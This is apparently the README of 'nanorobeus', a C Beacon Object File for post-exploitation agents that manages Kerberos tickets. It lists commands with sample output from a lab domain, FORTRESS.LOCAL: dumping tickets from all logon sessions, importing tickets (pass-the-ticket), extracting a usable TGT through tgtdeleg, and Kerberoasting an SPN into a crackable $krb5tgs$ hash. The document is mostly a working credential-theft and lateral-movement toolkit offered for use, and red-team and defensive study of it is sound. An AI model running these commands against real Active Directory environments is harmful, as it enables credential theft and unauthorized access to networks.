
COFF file (BOF) for managing Kerberos tickets.

Primary LanguageC


COFF file (BOF) for managing Kerberos tickets.

Supported agents


luid - get current logon ID

sessions [/luid:<0x0>| /all] - get logon sessions

klist [/luid:<0x0> | /all] - list Kerberos tickets

dump [/luid:<0x0> | /all] - dump Kerberos tickets

ptt /ticket:<base64> [/luid:<0x0>] - import Kerberos ticket into a logon session

purge [/luid:<0x0>] - purge Kerberos tickets

tgtdeleg /spn:<spn> - retrieve a usable TGT for the current user

kerberoast /spn:<spn> - perform Kerberoasting against specified SPN


Get current logon ID.

=> nanorobeus64 luid

[+] Current LogonId: 0:0x19ea88e

Get detailed information about the current logon session.

=> nanorobeus64 sessions

UserName                : User
Domain                  : FORTRESS
LogonId                 : 0:0x19ea88e
Session                 : 2
UserSID                 : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package  : Kerberos
LogonType               : Interactive
LogonTime (UTC)         : 2/7/2022 19:22:43
LogonServer             : SERVER
LogonServerDNSDomain    : FORTRESS.LOCAL
UserPrincipalName       : user@fortress.local

List Kerberos tickets for the current logon session. When elevated, use /all to list tickets from all of the sessions or /luid:0x0 to list tickets in a specified logon session.

=> nanorobeus64 klist

UserName                : User
Domain                  : FORTRESS
LogonId                 : 0:0x19ea88e
Session                 : 2
UserSID                 : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package  : Kerberos
LogonType               : Interactive
LogonTime (UTC)         : 2/7/2022 19:22:43
LogonServer             : SERVER
LogonServerDNSDomain    : FORTRESS.LOCAL
UserPrincipalName       : user@fortress.local

[*] Cached tickets: (6)

	Client name     : User @ FORTRESS.LOCAL
	Server name     : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL
	Start time      : 2/7/2022 19:22:44 (UTC)
	End time        : 3/7/2022 5:22:43 (UTC)
	Renew time      : 9/7/2022 19:22:43 (UTC)
	Flags           : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000)
	Encryption type : AES256_CTS_HMAC_SHA1

Dump tickets from the current logon session. When elevated, use /all to dump tickets from all of the sessions or /luid:0x0 to dump tickets from a specified logon session.

=> nanorobeus64 dump

UserName                : User
Domain                  : FORTRESS
LogonId                 : 0:0x19ea88e
Session                 : 2
UserSID                 : S-1-5-21-1768674056-2740991423-664180583-1105
Authentication package  : Kerberos
LogonType               : Interactive
LogonTime (UTC)         : 2/7/2022 19:22:43
LogonServer             : SERVER
LogonServerDNSDomain    : FORTRESS.LOCAL
UserPrincipalName       : user@fortress.local

[*] Cached tickets: (6)

	Client name     : User @ FORTRESS.LOCAL
	Server name     : krbtgt/FORTRESS.LOCAL @ FORTRESS.LOCAL
	Start time      : 2/7/2022 19:22:44 (UTC)
	End time        : 3/7/2022 5:22:43 (UTC)
	Renew time      : 9/7/2022 19:22:43 (UTC)
	Flags           : forwardable, forwarded, renewable, pre_authent, name_canonicalize (0x60a10000)
	Encryption type : AES256_CTS_HMAC_SHA1
	Ticket          : doIFFjCCBRKgAwIBBaEDAgEWooIEGTCCBBVhggQRMIIEDaADAg...(snip)...

Import a ticket into the current logon session. When elevated, use /luid:0x0 to import the ticket into a specified logon session.

=> make_token network fortress.local test pass
=> nanorobeus64 ptt /ticket:doIFqjCCBaagAwIB...snip...

[+] Ticket successfully imported.

Purge all Kerberos tickets from the current logon session. When elevated, use /luid:0x0 to purge the tickets from a specified logon session.

=> nanorobeus64 purge

[+] Successfully purged tickets.

Retrieve a usable TGT for the current user.

=> nanorobeus64 tgtdeleg /spn:cifs/server.fortress.local

[*] Found the AP-REQ delegation ticket in the GSS-API output
[*] Authenticator etype: AES256_CTS_HMAC_SHA1
[*] Successfully extracted the service ticket session key
[*] Successfully decrypted authenticator
[+] Successfully extracted TGT: doIFeDCCBXSgAwIBBaEDAgEWooIEcjC...(snip)...

Perform Kerberoasting by specifying SPN:

=> nanorobeus64 kerberoast /spn:HTTP/server.fortress.local

[*] Target SPN: HTTP/server.fortress.local
[+] Hash: $krb5tgs$23$*$FORTRESS.LOCAL$HTTP/server.fortress.local*$ac5e2f4d28fd377...(snip)...
